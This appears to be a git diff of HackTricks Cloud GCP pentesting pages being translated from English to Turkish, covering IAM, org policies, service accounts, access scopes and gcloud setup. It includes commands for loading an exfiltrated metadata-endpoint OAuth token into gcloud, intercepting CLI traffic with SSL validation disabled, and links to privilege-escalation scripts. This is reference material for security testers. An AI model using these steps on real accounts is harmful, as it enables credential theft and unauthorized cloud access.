- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldnt make run the enumerate script).
- [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions.
- [**gcp_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): gcloud cli kullanarak bir GCP ortamını listelemek ve sonuçları bir dosyaya kaydetmek için Bash scripti.
- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Yüksek IAM ayrıcalıklarını listelemek ve bunları kötüye kullanarak GCP'de ayrıcalıkları yükseltmek için scriptler (listeleme scriptini çalıştırmayı başaramadım).
- [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): İzinlerinizi brute force yapmak için script.
## gcloud config & debug
```bash
# Login so gcloud can use your credentials
gcloud auth login
@@ -198,13 +189,11 @@ gcloud auth application-default print-access-token
# Update gcloud
gcloud components update
```
### Capture gcloud, gsutil... network
Remember that you can use the **parameter** **`--log-http`** with the **`gcloud`** cli to **print** the **requests** the tool is performing. If you don't want the logs to redact the token value use `gcloud config set log_http_redact_token false`
Moreover, to intercept the communication:
Unutmayın ki **`gcloud`** cli ile **yapılan** **istekleri** **yazdırmak** için **`--log-http`** **parametresini** kullanabilirsiniz. Logların token değerini gizlemesini istemiyorsanız `gcloud config set log_http_redact_token false` kullanın.
Ayrıca, iletişimi kesmek için:
```bash
gcloud config set proxy/address 127.0.0.1
gcloud config set proxy/port 8080
@@ -221,11 +210,9 @@ gcloud config unset proxy/type
gcloud config unset auth/disable_ssl_validation
gcloud config unset core/custom_ca_certs_file
```
### OAuth token configure in gcloud
In order to **use an exfiltrated service account OAuth token from the metadata endpoint** you can just do:
**Metadata uç noktasından sızdırılmış bir hizmet hesabı OAuth token'ını kullanmak için** sadece şunu yapabilirsiniz:
```bash
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>
@@ -237,13 +224,8 @@ gcloud config set auth/access_token_file /some/path/to/token
gcloud projects list
gcloud config unset auth/access_token_file
```
## References
## Referanslar
- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
{{#include ../../banners/hacktricks-training.md}}

222
src/pentesting-cloud/gcp-security/gcp-basic-information/README.md
View File

@@ -1,207 +1,198 @@
# GCP - Basic Information
# GCP - Temel Bilgiler
{{#include ../../../banners/hacktricks-training.md}}
## **Resource hierarchy**
## **Kaynak hiyerarşisi**
Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
At a high level, it looks like this:
Google Cloud, geleneksel bir dosya sistemine kavramsal olarak benzer bir [Kaynak hiyerarşisi](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) kullanır. Bu, politikalar ve izinler için belirli ekleme noktaları ile mantıksal bir ebeveyn/çocuk iş akışı sağlar.
Yüksek seviyede, bu şekilde görünür:
```
Organization
--> Folders
--> Projects
--> Resources
--> Projects
--> Resources
```
A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
Bir sanal makine (Compute Instance olarak adlandırılır) bir kaynaktır. Bir kaynak, muhtemelen diğer Compute Instance'lar, depolama bucket'ları vb. ile birlikte bir projede bulunur.
<figure><img src="../../../images/image (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption><p><a href="https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg">https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg</a></p></figcaption></figure>
## **Projects Migration**
## **Projeler Göçü**
It's possible to **migrate a project without any organization** to an organization with the permissions `roles/resourcemanager.projectCreator` and `roles/resourcemanager.projectMover`. If the project is inside other organization, it's needed to contact GCP support to **move them out of the organization first**. For more info check [**this**](https://medium.com/google-cloud/migrating-a-project-from-one-organization-to-another-gcp-4b37a86dd9e6).
Bir projeyi **herhangi bir organizasyonsuz bir organizasyona taşımak mümkündür**; bunun için `roles/resourcemanager.projectCreator` ve `roles/resourcemanager.projectMover` izinlerine sahip olmanız gerekir. Proje başka bir organizasyonun içindeyse, **öncelikle organizasyondan çıkarmak için GCP desteği ile iletişime geçmek** gerekmektedir. Daha fazla bilgi için [**şuraya**](https://medium.com/google-cloud/migrating-a-project-from-one-organization-to-another-gcp-4b37a86dd9e6) bakın.
## **Organization Policies**
## **Organizasyon Politikaları**
Allow to centralize control over your organization's cloud resources:
Organizasyonunuzun bulut kaynakları üzerinde merkezi kontrol sağlamaya olanak tanır:
- Centralize control to **configure restrictions** on how your organizations resources can be used.
- Define and establish **guardrails** for your development teams to stay within compliance boundaries.
- Help project owners and their teams move quickly without worry of breaking compliance.
- Organizasyonunuzun kaynaklarının nasıl kullanılabileceği konusunda **kısıtlamaları yapılandırmak** için merkezi kontrol sağlayın.
- Geliştirme ekiplerinizin uyum sınırları içinde kalmasını sağlamak için **koruma önlemleri** tanımlayın ve oluşturun.
- Proje sahiplerine ve ekiplerine uyumu ihlal etme endişesi olmadan hızlı hareket etme konusunda yardımcı olun.
These policies can be created to **affect the complete organization, folder(s) or project(s)**. Descendants of the targeted resource hierarchy node **inherit the organization policy**.
Bu politikalar, **tüm organizasyonu, klasör(ler) veya proje(ler)** etkilemek üzere oluşturulabilir. Hedeflenen kaynak hiyerarşi düğümünün altındaki varlıklar **organizasyon politikasını miras alır**.
In order to **define** an organization policy, **you choose a** [**constraint**](https://cloud.google.com/resource-manager/docs/organization-policy/overview#constraints), which is a particular type of restriction against either a Google Cloud service or a group of Google Cloud services. You **configure that constraint with your desired restrictions**.
Bir organizasyon politikasını **tanımlamak için** bir [**kısıtlama**](https://cloud.google.com/resource-manager/docs/organization-policy/overview#constraints) seçersiniz; bu, belirli bir Google Cloud hizmetine veya bir grup Google Cloud hizmetine karşı bir kısıtlama türüdür. Bu kısıtlamayı **istediğiniz kısıtlamalarla yapılandırırsınız**.
<figure><img src="../../../images/image (217).png" alt=""><figcaption><p><a href="https://cloud.google.com/resource-manager/img/org-policy-concepts.svg">https://cloud.google.com/resource-manager/img/org-policy-concepts.svg</a></p></figcaption></figure>
#### Common use cases <a href="#common_use_cases" id="common_use_cases"></a>
#### Yaygın kullanım durumları <a href="#common_use_cases" id="common_use_cases"></a>
- Limit resource sharing based on domain.
- Limit the usage of Identity and Access Management service accounts.
- Restrict the physical location of newly created resources.
- Disable service account creation
- Alan adına dayalı kaynak paylaşımını sınırlayın.
- Kimlik ve Erişim Yönetimi hizmet hesaplarının kullanımını sınırlayın.
- Yeni oluşturulan kaynakların fiziksel konumunu kısıtlayın.
- Hizmet hesabı oluşturmayı devre dışı bırakın.
<figure><img src="../../../images/image (172).png" alt=""><figcaption></figcaption></figure>
There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.**
Organizasyonunuzun kaynakları üzerinde ince ayar kontrolü sağlayan daha birçok kısıtlama vardır. **Daha fazla bilgi için** [**Tüm Organizasyon Politikası Hizmeti kısıtlamalarının listesine**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**bakın.**
### **Default Organization Policies**
### **Varsayılan Organizasyon Politikaları**
<details>
<summary>These are the policies that Google will add by default when setting up your GCP organization:</summary>
<summary>GCP organizasyonunuzu kurarken Google'ın varsayılan olarak ekleyeceği politikalar şunlardır:</summary>
**Access Management Policies**
**Erişim Yönetimi Politikaları**
- **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications.
- **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization.
- **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access.
- **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets.
- **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys.
- **Alan kısıtlamalı kişiler:** Belirtilen alanlarınızın dışındaki Temel Kişilere kullanıcı eklenmesini engeller. Bu, Temel Kişilerin yalnızca seçilen alanlarınızdaki yönetilen kullanıcı kimliklerinin platform bildirimlerini almasına izin verir.
- **Alan kısıtlamalı paylaşım:** Belirtilen alanlarınızın dışındaki IAM politikalarına kullanıcı eklenmesini engeller. Bu, IAM politikalarının yalnızca seçilen alanlarınızdaki yönetilen kullanıcı kimliklerinin bu organizasyondaki kaynaklara erişmesine izin vermesiyle sınırlıdır.
- **Halka açık erişim önleme:** Cloud Storage bucket'larının halka açılmasını engeller. Bu, bir geliştiricinin Cloud Storage bucket'larını kimlik doğrulaması yapılmamış internet erişimine sahip olacak şekilde yapılandırmasını engeller.
- **Eşit düzeyde bucket erişimi:** Cloud Storage bucket'larında nesne düzeyinde erişim kontrol listelerini (ACL) engeller. Bu, erişim yönetiminizi Cloud Storage bucket'larındaki tüm nesneler üzerinde IAM politikalarını tutarlı bir şekilde uygulayarak basitleştirir.
- **OS girişini zorunlu kıl:** Yeni projelerde oluşturulan VM'lerde OS Girişi etkin olacaktır. Bu, SSH erişimini IAM kullanarak yönetmenizi sağlar; bireysel SSH anahtarları oluşturup yönetmenize gerek kalmaz.
**Additional security policies for service accounts**
**Hizmet hesapları için ek güvenlik politikaları**
- **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation.
- **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials.
- **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material.
- **Otomatik IAM atamalarını devre dışı bırak:** Varsayılan App Engine ve Compute Engine hizmet hesaplarının oluşturulurken projeye Editor IAM rolü otomatik olarak verilmesini engeller. Bu, hizmet hesaplarının oluşturulurken aşırı izinli IAM rolleri almasını engeller.
- **Hizmet hesabı anahtarı oluşturmayı devre dışı bırak:** Kamuya açık hizmet hesabı anahtarlarının oluşturulmasını engeller. Bu, kalıcı kimlik bilgilerini açığa çıkarma riskini azaltmaya yardımcı olur.
- **Hizmet hesabı anahtarı yüklemeyi devre dışı bırak:** Kamuya açık hizmet hesabı anahtarlarının yüklenmesini engeller. Bu, sızdırılan veya yeniden kullanılan anahtar materyali riskini azaltmaya yardımcı olur.
**Secure VPC network configuration policies**
**Güvenli VPC ağ yapılandırma politikaları**
- **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic.
- **VM örnekleri için izin verilen dış IP'leri tanımlayın:** Kamu IP'sine sahip Compute örneklerinin oluşturulmasını engeller; bu, onları internet trafiğine maruz bırakabilir.
* **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs.
* **VM iç içe sanallaştırmayı devre dışı bırak:** Compute Engine VM'lerinde iç içe VM'lerin oluşturulmasını engeller. Bu, izlenmeyen iç içe VM'lerin güvenlik riskini azaltır.
- **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a servers serial port using the Compute Engine API.
- **VM seri portunu devre dışı bırak:** Compute Engine VM'lerine seri port erişimini engeller. Bu, bir sunucunun seri portuna Compute Engine API'si kullanarak giriş yapılmasını engeller.
* **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases.
* **Cloud SQL örneklerinde yetkilendirilmiş ağları kısıtla:** Kamuya açık veya dahili olmayan ağ aralıklarının Cloud SQL veritabanlarınıza erişmesini engeller.
- **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses.
- **IP adresinin türüne göre Protokol Yönlendirmeyi kısıtla:** Dış IP adresleri için VM protokol yönlendirmesini engeller.
* **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic.
* **Cloud SQL örneklerinde Kamu IP erişimini kısıtla:** Kamu IP'sine sahip Cloud SQL örneklerinin oluşturulmasını engeller; bu, onları internet trafiğine maruz bırakabilir.
- **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects.
- **Paylaşılan VPC proje iptalini kısıtla:** Paylaşılan VPC ana projelerinin kazara silinmesini engeller.
* **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability.
* **Yeni projeler için dahili DNS ayarını Zonal DNS Sadece olarak ayarla:** Hizmet kullanılabilirliğini azaltan eski bir DNS ayarının kullanılmasını engeller.
- **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules.
- **Varsayılan ağ oluşturmayı atla:** Varsayılan VPC ağının ve ilgili kaynakların otomatik olarak oluşturulmasını engeller. Bu, aşırı izinli varsayılan güvenlik duvarı kurallarını önler.
* **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access.
* **VPC Dış IPv6 kullanımını devre dışı bırak:** Yetkisiz internet erişimine maruz kalabilecek dış IPv6 alt ağlarının oluşturulmasını engeller.
</details>
## **IAM Roles**
## **IAM Rolleri**
These are like IAM policies in AWS as **each role contains a set of permissions.**
Bunlar, **her rolün bir dizi izin içerdiği** AWS'deki IAM politikalarına benzer.
However, unlike in AWS, there is **no centralized repo** of roles. Instead of that, **resources give X access roles to Y principals**, and the only way to find out who has access to a resource is to use the **`get-iam-policy` method over that resource**.\
This could be a problem because this means that the only way to find out **which permissions a principal has is to ask every resource who is it giving permissions to**, and a user might not have permissions to get permissions from all resources.
Ancak, AWS'deki gibi **merkezi bir rol deposu yoktur**. Bunun yerine, **kaynaklar X erişim rolü verir Y ilkelerine**, ve bir kaynağa kimin erişimi olduğunu öğrenmenin tek yolu, o kaynak üzerinde **`get-iam-policy` yöntemini kullanmaktır**.\
Bu bir sorun olabilir çünkü bu, bir ilkenin hangi izinlere sahip olduğunu öğrenmenin tek yolunun, her kaynağa kimin izin verdiğini sormak olduğu anlamına gelir ve bir kullanıcının tüm kaynaklardan izinleri alma yetkisi olmayabilir.
There are **three types** of roles in IAM:
IAM'de **üç tür** rol vardır:
- **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
- **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles).
- **Custom roles**, which provide granular access according to a user-specified list of permissions.
- **Temel/Primitif roller**, **Sahip**, **Düzenleyici** ve **Görüntüleyici** rollerini içerir; bu roller IAM'ın tanıtılmasından önce mevcuttu.
- **Ön tanımlı roller**, belirli bir hizmet için ayrıntılı erişim sağlar ve Google Cloud tarafından yönetilir. Birçok ön tanımlı rol vardır; bunların **hepsini sahip oldukları ayrıcalıklarla birlikte** [**buradan**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles) görebilirsiniz.
- **Özel roller**, kullanıcı tarafından belirtilen izinler listesine göre ayrıntılı erişim sağlar.
There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it.
GCP'de binlerce izin vardır. Bir rolün izinlere sahip olup olmadığını kontrol etmek için [**buradan izni arayabilirsiniz**](https://cloud.google.com/iam/docs/permissions-reference) ve hangi rollerin buna sahip olduğunu görebilirsiniz.
You can also [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product_specific_documentation) **offered by each product.** Note that some **roles** cannot be attached to users and **only to SAs because some permissions** they contain.\
Moreover, note that **permissions** will only **take effect** if they are **attached to the relevant service.**
Ayrıca, [**buradan ön tanımlı rolleri arayabilirsiniz**](https://cloud.google.com/iam/docs/understanding-roles#product_specific_documentation) **her ürün tarafından sunulan.** Bazı **rollerin** kullanıcılara eklenemeyeceğini ve **yalnızca SA'lara eklenebileceğini** unutmayın; çünkü içerdiği bazı izinler vardır.\
Ayrıca, **izinlerin** yalnızca **ilgili hizmete eklenirse** **geçerli olacağını** unutmayın.
Or check if a **custom role can use a** [**specific permission in here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
Veya bir **özel rolün** [**belirli bir izni burada kullanıp kullanamayacağını kontrol edebilirsiniz**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
{{#ref}}
../gcp-services/gcp-iam-and-org-policies-enum.md
{{#endref}}
## Users <a href="#default-credentials" id="default-credentials"></a>
## Kullanıcılar <a href="#default-credentials" id="default-credentials"></a>
In **GCP console** there **isn't any Users or Groups** management, that is done in **Google Workspace**. Although you could synchronize a different identity provider in Google Workspace.
**GCP konsolunda** **Kullanıcılar veya Gruplar** yönetimi yoktur; bu, **Google Workspace** içinde yapılır. Ancak, Google Workspace'te farklı bir kimlik sağlayıcısını senkronize edebilirsiniz.
You can access Workspaces **users and groups in** [**https://admin.google.com**](https://admin.google.com/).
Workspace **kullanıcıları ve gruplarına** [**https://admin.google.com**](https://admin.google.com/) adresinden erişebilirsiniz.
**MFA** can be **forced** to Workspaces users, however, an **attacker** could use a token to access GCP **via cli which won't be protected by MFA** (it will be protected by MFA only when the user logins to generate it: `gcloud auth login`).
**MFA**, Workspace kullanıcılarına **zorunlu kılınabilir**, ancak bir **saldırgan**, MFA ile korunmayan GCP'ye **cli üzerinden bir token kullanarak erişebilir** (kullanıcı bunu oluşturmak için giriş yaptığında MFA ile korunacaktır: `gcloud auth login`).
## Groups
## Gruplar
When an organisation is created several groups are **strongly suggested to be created.** If you manage any of them you might have compromised all or an important part of the organization:
Bir organizasyon oluşturulduğunda birkaç grup **oluşturulması şiddetle önerilir.** Bunlardan herhangi birini yönetiyorsanız, organizasyonun tamamını veya önemli bir kısmını tehlikeye atmış olabilirsiniz:
<table data-header-hidden><thead><tr><th width="299.3076923076923"></th><th></th></tr></thead><tbody><tr><td><strong>Group</strong></td><td><strong>Function</strong></td></tr><tr><td><strong><code>gcp-organization-admins</code></strong><br><em>(group or individual accounts required for checklist)</em></td><td>Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to all of your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.</td></tr><tr><td><strong><code>gcp-network-admins</code></strong><br><em>(required for checklist)</em></td><td>Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.</td></tr><tr><td><strong><code>gcp-billing-admins</code></strong><br><em>(required for checklist)</em></td><td>Setting up billing accounts and monitoring their usage.</td></tr><tr><td><strong><code>gcp-developers</code></strong><br><em>(required for checklist)</em></td><td>Designing, coding, and testing applications.</td></tr><tr><td><strong><code>gcp-security-admins</code></strong><br></td><td>Establishing and managing security policies for the entire organization, including access management and <a href="https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints">organization constraint policies</a>. See the <a href="https://cloud.google.com/architecture/security-foundations/authentication-authorization#users_and_groups">Google Cloud security foundations guide</a> for more information about planning your Google Cloud security infrastructure.</td></tr><tr><td><strong><code>gcp-devops</code></strong></td><td>Creating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.</td></tr><tr><td><strong><code>gcp-logging-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-logging-viewers</code></strong></td><td></td></tr><tr><td><strong><code>gcp-monitor-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-billing-viewer</code></strong><br><em>(no longer by default)</em></td><td>Monitoring the spend on projects. Typical members are part of the finance team.</td></tr><tr><td><strong><code>gcp-platform-viewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing resource information across the Google Cloud organization.</td></tr><tr><td><strong><code>gcp-security-reviewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing cloud security.</td></tr><tr><td><strong><code>gcp-network-viewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing network configurations.</td></tr><tr><td><strong><code>grp-gcp-audit-viewer</code></strong><br><em>(no longer by default)</em></td><td>Viewing audit logs.</td></tr><tr><td><strong><code>gcp-scc-admin</code></strong><br><em>(no longer by default)</em></td><td>Administering Security Command Center.</td></tr><tr><td><strong><code>gcp-secrets-admin</code></strong><br><em>(no longer by default)</em></td><td>Managing secrets in Secret Manager.</td></tr></tbody></table>
<table data-header-hidden><thead><tr><th width="299.3076923076923"></th><th></th></tr></thead><tbody><tr><td><strong>Grup</strong></td><td><strong>Fonksiyon</strong></td></tr><tr><td><strong><code>gcp-organization-admins</code></strong><br><em>(kontrol listesi için grup veya bireysel hesaplar gereklidir)</em></td><td>Organizasyona ait herhangi bir kaynağı yönetmek. Bu rolü dikkatli bir şekilde atayın; organizasyon yöneticileri tüm Google Cloud kaynaklarınıza erişim sağlar. Alternatif olarak, bu işlev yüksek ayrıcalıklı olduğundan, bir grup oluşturmak yerine bireysel hesaplar kullanmayı düşünün.</td></tr><tr><td><strong><code>gcp-network-admins</code></strong><br><em>(kontrol listesi için gereklidir)</em></td><td>Ağlar, alt ağlar, güvenlik duvarı kuralları ve Cloud Router, Cloud VPN ve bulut yük dengeleyicileri gibi ağ cihazları oluşturma.</td></tr><tr><td><strong><code>gcp-billing-admins</code></strong><br><em>(kontrol listesi için gereklidir)</em></td><td>Faturalama hesaplarını ayarlama ve kullanımını izleme.</td></tr><tr><td><strong><code>gcp-developers</code></strong><br><em>(kontrol listesi için gereklidir)</em></td><td>Uygulamaları tasarlama, kodlama ve test etme.</td></tr><tr><td><strong><code>gcp-security-admins</code></strong><br></td><td>Tüm organizasyon için erişim yönetimi ve <a href="https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints">organizasyon kısıtlama politikaları</a> dahil olmak üzere güvenlik politikalarını oluşturma ve yönetme. Google Cloud güvenlik altyapınızı planlama hakkında daha fazla bilgi için <a href="https://cloud.google.com/architecture/security-foundations/authentication-authorization#users_and_groups">Google Cloud güvenlik temelleri kılavuzuna</a> bakın.</td></tr><tr><td><strong><code>gcp-devops</code></strong></td><td>Sürekli entegrasyon ve teslimatı, izlemeyi ve sistem sağlama süreçlerini destekleyen uçtan uca boru hatları oluşturma veya yönetme.</td></tr><tr><td><strong><code>gcp-logging-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-logging-viewers</code></strong></td><td></td></tr><tr><td><strong><code>gcp-monitor-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-billing-viewer</code></strong><br><em>(artık varsayılan olarak yok)</em></td><td>Projelerdeki harcamaları izleme. Tipik üyeler finans ekibinin bir parçasıdır.</td></tr><tr><td><strong><code>gcp-platform-viewer</code></strong><br><em>(artık varsayılan olarak yok)</em></td><td>Google Cloud organizasyonu genelinde kaynak bilgilerini gözden geçirme.</td></tr><tr><td><strong><code>gcp-security-reviewer</code></strong><br><em>(artık varsayılan olarak yok)</em></td><td>Bulut güvenliğini gözden geçirme.</td></tr><tr><td><strong><code>gcp-network-viewer</code></strong><br><em>(artık varsayılan olarak yok)</em></td><td>Ağ yapılandırmalarını gözden geçirme.</td></tr><tr><td><strong><code>grp-gcp-audit-viewer</code></strong><br><em>(artık varsayılan olarak yok)</em></td><td>Denetim günlüklerini görüntüleme.</td></tr><tr><td><strong><code>gcp-scc-admin</code></strong><br><em>(artık varsayılan olarak yok)</em></td><td>Güvenlik Komut Merkezi'ni yönetme.</td></tr><tr><td><strong><code>gcp-secrets-admin</code></strong><br><em>(artık varsayılan olarak yok)</em></td><td>Secret Manager'da gizli bilgileri yönetme.</td></tr></tbody></table>
## **Default Password Policy**
## **Varsayılan Şifre Politikası**
- Enforce strong passwords
- Between 8 and 100 characters
- No reuse
- No expiration
- If people is accessing Workspace through a third party provider, these requirements aren't applied.
- Güçlü şifreleri zorunlu kıl
- 8 ile 100 karakter arasında
- Yeniden kullanım yok
- Süre sona erme yok
- İnsanlar Workspace'e üçüncü taraf bir sağlayıcı aracılığıyla erişiyorsa, bu gereksinimler uygulanmaz.
<figure><img src="../../../images/image (20).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../images/image (22).png" alt=""><figcaption></figcaption></figure>
## **Service accounts**
## **Hizmet hesapları**
These are the principals that **resources** can **have** **attached** and access to interact easily with GCP. For example, it's possible to access the **auth token** of a Service Account **attached to a VM** in the metadata.\
It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
Bunlar, **kaynakların** **bağlı olabileceği** ve GCP ile etkileşimde bulunmayı kolaylaştıran ilkeleridir. Örneğin, bir VM'ye **bağlı bir Hizmet Hesabının** **auth token'ına** metadata'da erişmek mümkündür.\
**IAM ve erişim kapsamlarını** kullanırken bazı **çelişkilerle** karşılaşmak mümkündür. Örneğin, hizmet hesabınızın `compute.instanceAdmin` IAM rolü olabilir, ancak ihlal ettiğiniz örnek `https://www.googleapis.com/auth/compute.readonly` kapsam kısıtlaması ile sınırlı olabilir. Bu, örneğinize otomatik olarak atanan OAuth token'ı kullanarak herhangi bir değişiklik yapmanızı engeller.
It's similar to **IAM roles from AWS**. But not like in AWS, **any** service account can be **attached to any service** (it doesn't need to allow it via a policy).
Several of the service accounts that you will find are actually **automatically generated by GCP** when you start using a service, like:
Bu, **AWS'deki IAM rollerine** benzer. Ancak AWS'deki gibi, **herhangi bir** hizmet hesabı **herhangi bir hizmete** **bağlanabilir** (bir politika aracılığıyla izin vermesi gerekmez).
Bulacağınız birçok hizmet hesabı aslında bir hizmet kullanmaya başladığınızda **GCP tarafından otomatik olarak oluşturulur**, örneğin:
```
PROJECT_NUMBER-compute@developer.gserviceaccount.com
PROJECT_ID@appspot.gserviceaccount.com
```
However, it's also possible to create and attach to resources **custom service accounts**, which will look like this:
Ancak, **özel hizmet hesapları** oluşturmak ve bunlara eklemek de mümkündür, bu da şöyle görünecektir:
```
SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
```
### **Anahtarlar & Tokenlar**
### **Keys & Tokens**
GCP'ye bir hizmet hesabı olarak erişmenin 2 ana yolu vardır:
There are 2 main ways to access GCP as a service account:
- **OAuth tokenları aracılığıyla**: Bunlar, metadata uç noktaları gibi yerlerden veya http isteklerini çalarak elde edeceğiniz tokenlardır ve **erişim kapsamları** ile sınırlıdır.
- **Anahtarlar**: Bunlar, hizmet hesabı olarak istekleri imzalamanıza ve hatta hizmet hesabı olarak eylemler gerçekleştirmek için OAuth tokenları oluşturmanıza olanak tanıyan genel ve özel anahtar çiftleridir. Bu anahtarlar tehlikelidir çünkü sınırlamak ve kontrol etmek daha karmaşıktır, bu yüzden GCP bunları oluşturmanızı önermemektedir.
- Her seferinde bir SA oluşturulduğunda, **GCP hizmet hesabı için bir anahtar oluşturur** ve kullanıcı bu anahtara erişemez (ve web uygulamasında listelenmez). [**bu başlığa**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) göre bu anahtar, **GCP tarafından dahili olarak** erişilebilir OAuth tokenları oluşturmak için metadata uç noktalarına erişim vermek amacıyla kullanılmaktadır.
- **Via OAuth tokens**: These are tokens that you will get from places like metadata endpoints or stealing http requests and they are limited by the **access scopes**.
- **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them.
- Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens.
### **Erişim Kapsamları**
### **Access scopes**
Erişim kapsamları, GCP API uç noktalarına erişmek için **oluşturulan OAuth tokenlarına eklenir**. Bunlar, OAuth tokenının **izinlerini kısıtlar**.\
Bu, bir tokenın bir kaynağın sahibi olmasına rağmen o kaynağa erişim sağlamak için token kapsamına sahip olmaması durumunda, tokenın **bu ayrıcalıkları (kötüye) kullanmak için kullanılamayacağı** anlamına gelir.
Access scope are **attached to generated OAuth tokens** to access the GCP API endpoints. They **restrict the permissions** of the OAuth token.\
This means that if a token belongs to an Owner of a resource but doesn't have the in the token scope to access that resource, the token **cannot be used to (ab)use those privileges**.
Google actually [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service_account_permissions) that **access scopes are not used and to rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programmatically.
You can see what **scopes** are **assigned** by **querying:**
Google aslında [önerir](https://cloud.google.com/compute/docs/access/service-accounts#service_account_permissions) ki **erişim kapsamları kullanılmasın ve tamamen IAM'e güvenilsin**. Web yönetim portalı aslında bunu zorunlu kılar, ancak erişim kapsamları yine de özel hizmet hesapları kullanılarak programlı olarak örneklere uygulanabilir.
Hangi **kapsamların** **atanmış olduğunu** **sorgulayarak** görebilirsiniz:
```bash
curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=<access_token>'
{
"issued_to": "223044615559.apps.googleusercontent.com",
"audience": "223044615559.apps.googleusercontent.com",
"user_id": "139746512919298469201",
